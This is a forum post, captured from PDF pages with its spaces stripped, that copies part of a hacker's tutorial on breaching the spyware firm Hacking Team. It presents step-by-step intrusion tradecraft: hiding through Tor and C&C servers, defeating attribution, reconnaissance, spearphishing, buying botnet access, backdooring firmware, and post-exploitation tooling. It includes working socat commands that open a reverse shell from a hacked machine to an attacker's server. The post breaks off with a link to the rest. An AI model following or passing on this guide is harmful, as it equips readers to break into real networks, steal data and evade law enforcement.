Escolar Documentos
Profissional Documentos
Cultura Documentos
Welcome,jasemc
0Notifications 5posts LastLogin:2ndMay2016 ControlPanel LogOut
Results1to1of1
+ReplytoThread
Thread:Howtohack,TipsandTutorialsfromREAL"Hacker"
Like SignUptoseewhatyourfriendslike.
ThreadTools SearchThread
2ndMay2016,12:46 #1
cybersniper
Howtohack,TipsandTutorialsfromREAL"Hacker"
RadiantHeirofApollo
SharekolangmgakSBsmgaGustomatutungHACKINGmaramikyongmkukuhangTipsandTutorialsdtokungPanumaging
successfulwhilehackingandnottogetcaught:)
ForthoseofyouwhowanttoknowhowhehackedtheHACKINGTEAM(thecontroversialgovernmentspyingandhackingtoolseller)
heresthestoryGOHERE!
AndforthoseofyouwhowantknowtheSTEPBYSTEPTips,TechniquesandTutorials.:)
Youusedtohavetosneakintoofficestoleakdocuments[2].Youusedtoneed
aguntorobabank.Nowyoucandobothfrombedwithalaptopinhand[3][4].
LiketheCNTsaidaftertheGammaGrouphack:"Let'stakeastepforwardwith
newformsofstruggle"[5].Hackingisapowerfultool,let'slearnandfight!
[1]http://pastebin.com/raw.php?i=cRYvK4jb
[2]https://en.wikipedia.org/wiki/Citize...tigate_the_FBI
[3]http://www.aljazeera.com/news/2015/0...083914167.html
[4]https://securelist.com/files/2015/02...ak_APT_eng.pdf
[5]http://madrid.cnt.es/noticia/conside...agammagroup
[2HackingTeam]
HackingTeamwasacompanythathelpedgovernmentshackandspyon
journalists,activists,politicalopposition,andotherthreatstotheirpower
[1][2][3][4][5][6][7][8][9][10][11].And,occasionally,onactualcriminals
andterrorists[12].Vincenzetti,theCEO,likedtoendhisemailswiththe
fascistslogan"boiachimolla".It'dbemorecorrecttosay"boiachivende
RCS".Theyalsoclaimedtohavetechnologytosolvethe"problem"posedbyTor
andthedarknet[13].ButseeingasI'mstillfree,Ihavemydoubtsabout
itseffectiveness.
[1]http://www.animalpolitico.com/2015/0...najepolitico/
[2]http://www.prensa.com/politica/clave...251324994.html
[3]http://www.24horas.mx/ecuadorespio...rlosfigueroa/
[4]https://citizenlab.org/2012/10/backd...ngofdissent/
[5]https://citizenlab.org/2014/02/hacki...njournalists/
[6]https://citizenlab.org/2015/03/hacki...getedspyware/
[7]http://focusecuador.net/2015/07/08/h...osenecuador/
[8]http://www.pri.org/stories/2015070...sarepersonal
[9]https://theintercept.com/2015/07/07/...ivecountries/
[10]http://www.wired.com/2013/06/spytoo...ogovernments/
[11]http://www.theregister.co.uk/2015/07...m_vietnam_apt/
[12]http://www.ilmessaggero.it/primopian...m1588888.html
[13]http://motherboard.vice.com/en_ca/re...kthedarkweb
http://www.symbianize.com/showthread.php?t=1349631&highlight=open+vpn 1/6
5/4/2016 Howtohack,TipsandTutorialsfromREAL"Hacker"
[3Staysafeoutthere]
Unfortunately,ourworldisbackwards.Yougetrichbydoingbadthingsandgo
tojailfordoinggood.Fortunately,thankstothehardworkofpeoplelike
theTorproject[1],youcanavoidgoingtojailbytakingafewsimple
precautions:
1)Encryptyourharddisk[2]
Iguesswhenthepolicearrivetoseizeyourcomputer,itmeansyou've
alreadymadealotofmistakes,butit'sbettertobesafe.
2)UseavirtualmachinewithalltrafficroutedthroughTor
Thisaccomplishestwothings.First,allyourtrafficisanonymizedthrough
Tor.Second,keepingyourpersonallifeandyourhackingonseparate
computershelpsyounottomixthembyaccident.
YoucanuseprojectslikeWhonix[3],Tails[4],QubesTorVM[5],or
somethingcustom[6].Here's[7]adetailedcomparison.
3)(Optional)Don'tconnectdirectlytoTor
Torisn'tapanacea.Theycancorrelatethetimesyou'reconnectedtoTor
withthetimesyourhackerhandleisactive.Also,therehavebeen
successfulattacksagainstTor[8].YoucanconnecttoTorusingother
peoples'wifi.Wifislax[9]isalinuxdistrowithalotoftoolsfor
crackingwifi.AnotheroptionistoconnecttoaVPNorabridgenode[10]
beforeTor,butthat'slesssecurebecausetheycanstillcorrelatethe
hacker'sactivitywithyourhouse'sinternetactivity(thiswasusedas
evidenceagainstJeremyHammond[11]).
TherealityisthatwhileTorisn'tperfect,itworksquitewell.WhenI
wasyoungandreckless,Ididplentyofstuffwithoutanyprotection(I'm
referringtohacking)apartfromTor,thatthepolicetriedtheirhardest
toinvestigate,andI'veneverhadanyproblems.
[1]https://www.torproject.org/
[2]https://info.securityinabox.org/es/chapter4
[3]https://www.whonix.org/
[4]https://tails.boum.org/
[5]https://www.qubesos.org/doc/privacy/torvm/
[6]https://trac.torproject.org/projects...ansparentProxy
[7]https://www.whonix.org/wiki/Comparison_with_Others
[8]https://blog.torproject.org/blog/tor...mationattack/
[9]http://www.wifislax.com/
[10]https://www.torproject.org/docs/bridges.html.en
[11]http://www.documentcloud.org/documen...anarchaos.html
[3.1Infrastructure]
Idon'thackdirectlyfromTorexitnodes.They'reonblacklists,they're
slow,andtheycan'treceiveconnectbacks.TorprotectsmyanonymitywhileI
connecttotheinfrastructureIusetohack,whichconsistsof:
1)DomainNames
ForC&Caddresses,andforDNStunnelsforguaranteedegress.
2)StableServers
ForuseasC&Cservers,toreceiveconnectbackshells,tolaunchattacks,
andtostoretheloot.
3)HackedServers
ForuseaspivotstohidetheIPaddressesofthestableservers.Andfor
whenIwantafastconnectionwithoutpivoting,forexampletoscanports,
scanthewholeinternet,downloadadatabasewithsqli,etc.
Obviously,youhavetouseananonymouspaymentmethod,likebitcoin(ifit's
usedcarefully).
[3.2Attribution]
Inthenewsweoftenseeattackstracedbacktogovernmentbackedhacking
groups("APTs"),becausetheyrepeatedlyusethesametools,leavethesame
footprints,andevenusethesameinfrastructure(domains,emails,etc).
They'renegligentbecausetheycanhackwithoutlegalconsequences.
Ididn'twanttomakethepolice'sworkanyeasierbyrelatingmyhackof
HackingTeamwithotherhacksI'vedoneorwithnamesIuseinmydaytoday
workasablackhathacker.So,Iusednewserversanddomainnames,registered
withnewemails,andpayedforwithnewbitcoinaddresses.Also,Ionlyused
toolsthatarepubliclyavailable,orthingsthatIwrotespecificallyfor
thisattack,andIchangedmywayofdoingsomethingstonotleavemyusual
forensicfootprint.
[4InformationGathering]
Althoughitcanbetedious,thisstageisveryimportant,sincethelargerthe
attacksurface,theeasieritistofindaholesomewhereinit.
http://www.symbianize.com/showthread.php?t=1349631&highlight=open+vpn 2/6
5/4/2016 Howtohack,TipsandTutorialsfromREAL"Hacker"
[4.1TechnicalInformation]
Sometoolsandtechniquesare:
1)Google
Alotofinterestingthingscanbefoundwithafewwellchosensearch
queries.Forexample,theidentityofDPR[1].ThebibleofGooglehacking
isthebook"GoogleHackingforPenetrationTesters".Youcanfindashort
summaryinSpanishat[2].
2)SubdomainEnumeration
Often,acompany'smainwebsiteishostedbyathirdparty,andyou'llfind
thecompany'sactualIPrangethankstosubdomainslikemx.company.comor
ns1.company.com.Also,sometimestherearethingsthatshouldn'tbeexposed
in"hidden"subdomains.Usefultoolsfordiscoveringdomainsandsubdomains
arefierce[3],theHarvester[4],andreconng[5].
3)Whoislookupsandreverselookups
WithareverselookupusingthewhoisinformationfromadomainorIPrange
ofacompany,youcanfindotherdomainsandIPranges.AsfarasIknow,
there'snofreewaytodoreverselookupsasidefromagoogle"hack":
"viadellamoscova13"site:www.findipaddress.com
"viadellamoscova13"site:domaintools.com
4)Portscanningandfingerprinting
Unliketheothertechniques,thistalkstothecompany'sservers.I
includeitinthissectionbecauseit'snotanattack,it'sjust
informationgathering.Thecompany'sIDSmightgenerateanalert,butyou
don'thavetoworrysincethewholeinternetisbeingscannedconstantly.
Forscanning,nmap[6]isprecise,andcanfingerprintthemajorityof
servicesdiscovered.ForcompanieswithverylargeIPranges,zmap[7]or
masscan[8]arefast.WhatWeb[9]orBlindElephant[10]canfingerprintweb
sites.
[1]http://www.nytimes.com/2015/12/27/bu...silkroad.html
[2]http://web.archive.org/web/201406100...con_google.pdf
[3]http://ha.ckers.org/fierce/
[4]https://github.com/laramies/theHarvester
[5]https://bitbucket.org/LaNMaSteR53/reconng
[6]https://nmap.org/
[7]https://zmap.io/
[8]https://github.com/robertdavidgraham/masscan
[9]http://www.morningstarsecurity.com/research/whatweb
[10]http://blindelephant.sourceforge.net/
[4.2SocialInformation]
Forsocialengineering,it'susefultohaveinformationabouttheemployees,
theirroles,contactinformation,operatingsystem,browser,plugins,
software,etc.Someresourcesare:
1)Google
Hereaswell,it'sthemostusefultool.
2)theHarvesterandreconng
Ialreadymentionedthemintheprevioussection,buttheyhavealotmore
functionality.Theycanfindalotofinformationquicklyand
automatically.It'sworthreadingalltheirdocumentation.
3)LinkedIn
Alotofinformationabouttheemployeescanbefoundhere.Thecompany's
recruitersarethemostlikelytoacceptyourconnectionrequests.
4)Data.com
Previouslyknownasjigsaw.Theyhavecontactinformationformany
employees.
5)FileMetadata
Alotofinformationaboutemployeesandtheirsystemscanbefoundin
metadataoffilesthecompanyhaspublished.Usefultoolsforfinding
filesonthecompany'swebsiteandextractingthemetadataaremetagoofil
[1]andFOCA[2].
[1]https://github.com/laramies/metagoofil
[2]https://www.elevenpaths.com/es/labst...a2/index.html
[5Enteringthenetwork]
Therearevariouswaystogetafoothold.SincethemethodIusedagainst
HackingTeamisuncommonandalotmoreworkthanisusuallynecessary,I'll
talkalittleaboutthetwomostcommonways,whichIrecommendtryingfirst.
[5.1SocialEngineering]
http://www.symbianize.com/showthread.php?t=1349631&highlight=open+vpn 3/6
5/4/2016 Howtohack,TipsandTutorialsfromREAL"Hacker"
Socialengineering,specificallyspearphishing,isresponsibleforthe
majorityofhacksthesedays.ForanintroductioninSpanish,see[1].For
moreinformationinEnglish,see[2](thethirdpart,"TargetedAttacks").For
funstoriesaboutthesocialengineeringexploitsofpastgenerations,see
[3].Ididn'twanttotrytospearphishHackingTeam,astheirwholebusiness
ishelpinggovernmentsspearphishtheiropponents,sothey'dbemuchmore
likelytorecognizeandinvestigateaspearphishingattempt.
[1]http://www.hacknbytes.com/2016/01/ap...onempire.html
[2]http://blog.cobaltstrike.com/2015/09...rseandnotes/
[3]http://www.netcomunity.com/lesterthe...ingsocial1.pdf
[5.2BuyingAccess]
ThankstohardworkingRussiansandtheirexploitkits,trafficsellers,and
botherders,manycompaniesalreadyhavecompromisedcomputersintheir
networks.AlmostalloftheFortune500,withtheirhugenetworks,havesome
botsalreadyinside.However,HackingTeamisaverysmallcompany,andmost
ofit'semployeesareinfosecexperts,sotherewasalowchancethatthey'd
alreadybeencompromised.
[5.3TechnicalExploitation]
AftertheGammaGrouphack,Idescribedaprocessforsearchingfor
vulnerabilities[1].HackingTeamhadonepublicIPrange:
inetnum:93.62.139.3293.62.139.47
descr:HTpublicsubnet
HackingTeamhadverylittleexposedtotheinternet.Forexample,unlike
GammaGroup,theircustomersupportsiteneededaclientcertificateto
connect.Whattheyhadwastheirmainwebsite(aJoomlabloginwhichJoomscan
[2]didn'tfindanythingserious),amailserver,acouplerouters,twoVPN
appliances,andaspamfilteringappliance.So,Ihadthreeoptions:lookfor
a0dayinJoomla,lookfora0dayinpostfix,orlookfora0dayinoneofthe
embeddeddevices.A0dayinanembeddeddeviceseemedliketheeasiestoption,
andaftertwoweeksofworkreverseengineering,Igotaremoterootexploit.
Sincethevulnerabilitiesstillhaven'tbeenpatched,Iwon'tgivemore
details,butformoreinformationonfindingthesekindsofvulnerabilities,
see[3]and[4].
[1]http://pastebin.com/raw.php?i=cRYvK4jb
[2]http://sourceforge.net/projects/joomscan/
[3]http://www.devttys0.com/
[4]https://docs.google.com/presentation...mDA2z9zzHpon8A
[6BePrepared]
IdidalotofworkandtestingbeforeusingtheexploitagainstHackingTeam.
Iwroteabackdooredfirmware,andcompiledvariouspostexploitationtools
fortheembeddeddevice.Thebackdoorservestoprotecttheexploit.Usingthe
exploitjustonceandthenreturningthroughthebackdoormakesitharderto
identifyandpatchthevulnerabilities.
ThepostexploitationtoolsthatI'dpreparedwere:
1)busybox
ForallthestandardUnixutilitiesthatthesystemdidn'thave.
2)nmap
ToscanandfingerprintHackingTeam'sinternalnetwork.
3)Responder.py
Themostusefultoolforattackingwindowsnetworkswhenyouhaveaccessto
theinternalnetwork,butnodomainuser.
4)Python
ToexecuteResponder.py
5)tcpdump
Forsniffingtraffic.
6)dsniff
Forsniffingpasswordsfromplaintextprotocolslikeftp,andfor
arpspoofing.Iwantedtouseettercap,writtenbyHackingTeam'sownALoR
andNaGA,butitwashardtocompileitforthesystem.
7)socat
Foracomfortableshellwithapty:
my_server:socatfile:`tty`,raw,echo=0tcplisten:my_port
hackedbox:socatexec:'bashli',pty,stderr,setsid,sigint,sane\
tcp:my_server:my_port
Andusefulforalotmore,it'sanetworkingswissarmyknife.Seethe
examplessectionofitsdocumentation.
8)screen
http://www.symbianize.com/showthread.php?t=1349631&highlight=open+vpn 4/6
5/4/2016 Howtohack,TipsandTutorialsfromREAL"Hacker"
Liketheshellwithpty,itwasn'treallynecessary,butIwantedtofeel
athomeinHackingTeam'snetwork.
9)aSOCKSproxyserver
Tousewithproxychainstobeabletoaccesstheirlocalnetworkfromany
program.
10)tgcd
Forforwardingports,likefortheSOCKSserver,throughthefirewall.
[1]https://www.busybox.net/
[2]https://nmap.org/
[3]https://github.com/SpiderLabs/Responder
[4]https://github.com/bendmorris/staticpython
[5]http://www.tcpdump.org/
[6]http://www.monkey.org/~dugsong/dsniff/
[7]http://www.destunreach.org/socat/
[8]https://www.gnu.org/software/screen/
[9]http://averagecoder.blogspot.com/20...rverinc.html
[10]http://tgcd.sourceforge.net/
Theworstthingthatcouldhappenwouldbeformybackdoororpostexploitation
toolstomakethesystemunstableandcauseanemployeetoinvestigate.SoI
spentaweektestingmyexploit,backdoor,andpostexploitationtoolsinthe
networksofothervulnerablecompaniesbeforeenteringHackingTeam'snetwork.
[7WatchandListen]
Nowinsidetheirinternalnetwork,Iwantedtotakealookaroundandthink
aboutmynextstep.IstartedResponder.pyinanalysismode(Atolisten
withoutsendingpoisonedresponses),anddidaslowscanwithnmap.
[8NoSQLDatabases]
NoSQL,orratherNoAuthentication,hasbeenahugegifttothehacker
community[1].JustwhenIwasworriedthatthey'dfinallypatchedallofthe
authenticationbypassbugsinMySQL[2][3][4][5],newdatabasescameinto
stylethatlackauthenticationbydesign.NmapfoundafewinHackingTeam's
internalnetwork:
27017/tcpopenmongodbMongoDB2.6.5
|mongodbdatabases:
|ok=1
|totalSizeMb=47547
|totalSize=49856643072
...
|_version=2.6.5
27017/tcpopenmongodbMongoDB2.6.5
|mongodbdatabases:
|ok=1
|totalSizeMb=31987
|totalSize=33540800512
|databases
...
|_version=2.6.5
TheywerethedatabasesfortestinstancesofRCS.TheaudiothatRCSrecords
isstoredinMongoDBwithGridFS.Theaudiofolderinthetorrent[6]came
fromthis.Theywerespyingonthemselveswithoutmeaningto.
[1]https://www.shodan.io/search?query=product%3Amongodb
[2]https://community.rapid7.com/communi...flawinmysql
[3]http://archives.neohapsis.com/archiv...4q3/0001.html
[4]http://downloads.securityfocus.com/v...hoagie_mysql.c
[5]http://archives.neohapsis.com/archiv...002/0053.html
[6]https://ht.transparencytoolkit.org/audio/
CONTINUATION...............HINDINKASYAEHTOOLONGCHARACTERNRAW,HEHE:)
FORCOMPLETETUTORIALVISIT
http://pinoyprogrammer.co/vigilante...teamexplains/
Updated
Lasteditedbycybersniper2ndMay2016at16:58.
"IWouldn'tSayImaHacker"
"IWouldSay!IAMaResercher"
"AndipostallmyResearchinonePlaceANDSHAREITTOOTHERS"
http://pinoyprogrammer.co/:)
VisitmysitetofindoutmoreandaccessallmyRESEARCHin"
"SECURITY,HACKING,PROGRAMMING,WEBDEVELOPMENT
ANDINTERNETTIPSANDTRICKS"
http://www.symbianize.com/showthread.php?t=1349631&highlight=open+vpn 5/6
5/4/2016 Howtohack,TipsandTutorialsfromREAL"Hacker"
1UserSaysThankYoutocybersniperForThisUsefulPost.
SponsoredPost
+ReplytoThread
FacebookAccountHackVideoTutorial|Needhelpcan'tresearch@google
SimilarThreads
howtohackN73andNokia6600? Replies:5
ByhwatkinsinforumSymbianS60Apps LastPost:17thMar2011,00:40
helphowtohackE52andC5 Replies:6
ByshanedyinforumSymbianS603rdEd.Apps LastPost:15thFeb2011,08:00
Howtohackunhackablesite[tutorial] Replies:0
Bydens29_trekinforumPCHardwareChat LastPost:17thDec2010,16:13
Howtohackn72?Andwhatisdifferenttohackandnotphone? Replies:3
Byiane28inforumNokia LastPost:27thApr2010,14:48
HowtoFightDepressionandAnxietyfromWebMD Replies:0
ByrobinsonliminforumHealthandFitness LastPost:3rdJan2008,19:43
TagsforthisThread
None
ViewTagCloud Add/EditTags
PostingPermissions
Youmaypostnewthreads BBcodeisOn
Youmaypostreplies SmiliesareOn
Youmaypostattachments [IMG]codeisOff
Youmayedityourposts [VIDEO]codeisOn
HTMLcodeisOff
ForumRules
AlltimesareGMT+8.Thetimenowis12:57.
http://www.symbianize.com/showthread.php?t=1349631&highlight=open+vpn 6/6